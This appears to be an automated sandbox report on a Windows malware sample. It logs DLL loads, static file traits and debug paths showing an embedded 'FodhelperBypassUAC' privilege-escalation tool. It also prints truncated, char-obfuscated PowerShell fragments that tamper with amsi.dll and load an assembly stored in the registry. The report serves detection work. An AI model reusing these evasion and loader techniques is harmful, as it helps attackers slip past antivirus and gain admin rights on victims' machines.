Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\e7WMhx18XN.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations Jump to behavior
Source: e7WMhx18XN.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: e7WMhx18XN.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: e7WMhx18XN.exe Static file information: File size 8201216 > 1048576
Source: e7WMhx18XN.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x7d1a00
Source: e7WMhx18XN.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1346529843.000000001C470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp, FodhelperBypassUAC.exe, 0000000C.00000000.1323844842.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp, FodhelperBypassUAC.exe, 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: cwdC:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUACexeC:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.41.34120\bin\HostX64\x64\link.exepdbC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdbcmd /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: AC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_xfg_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\gs\amd64\amdsecgs.asmC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUAC\x64\Release\vc143.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($PQfPIIgelMLvUB,$ldjQKaGUcclhcmhFUiK).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$rcGSxwaaaaKUimwsu=$yNoIOiWMAQGoVU.Invoke
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TW'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'r'+[Char](98)+''+[Char](120)+'-'+[Char]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($scqjgRcUiQSTBu,$ivpgsCMtihnowdNIBeH).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+'.d'+'l'+''+[Char](108)+'');$EVtyXOreozsddqFlq=$xRDavNIGnzLLon.Invoke($Null,@([Object]$s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAcc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+'x
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($VQjNvPkAQyhVaI,$vKwAkflJKGpUwNhZmaw).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+'l');$ZjZDXRvDVpnzBqGGH=$ONnlOWkAfaUoGE.Invo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+'A'+'R'+[Char](69)+'').GetValue(''+'$'+'r'+[Char](98)+''+'x'+'-'+[Char](115)+'t
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($ViSGjgKFWHOvJi,$LYPstsFMvGDueCuqqFR).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+'dll');$iERkOmaiRJGubWlVw=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$JKCdsPm,[Object
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'AR'+'E'+'').GetValue(''+'$'+''+[Char](114)+''+'b'+''+[Char](120)+''+'-'+''
Obfuscated command line found
